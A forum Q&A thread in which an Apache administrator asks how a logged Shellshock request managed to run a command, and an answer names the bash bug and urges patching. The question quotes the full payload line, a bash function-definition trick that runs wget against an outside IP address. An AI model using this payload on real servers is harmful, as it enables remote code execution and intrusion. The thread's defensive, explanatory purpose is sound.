0

I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following http request line:

() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"

It effectively downloaded the file in question.
Could any one explain how this request manages to actually execute the bash command ?

Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions and if there isn't some way to change the Apache configuration parameters so that request commands are never executed ...

This may be unrelated, but several hours later, there has begun a stream of strange requests from the internal interface, occurring every 2 seconds:

host:    ":443"   request:  "NICK netply"    source ip: 127.0.0.1
fedorqui
  • 275,237
  • 103
  • 548
  • 598
Robert Imhoff
  • 471
  • 4
  • 6

1 Answers1

1

This is a vulnerability in bash which is exposed via Apache referred to as the "Shellshock" or "bash bug" and allows an attacker to execute arbitrary commands both locally and remotely making it a very serious vulnerability.

You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:

digitalocean.com

shellshocker.net

itsmejodie
  • 4,148
  • 1
  • 18
  • 20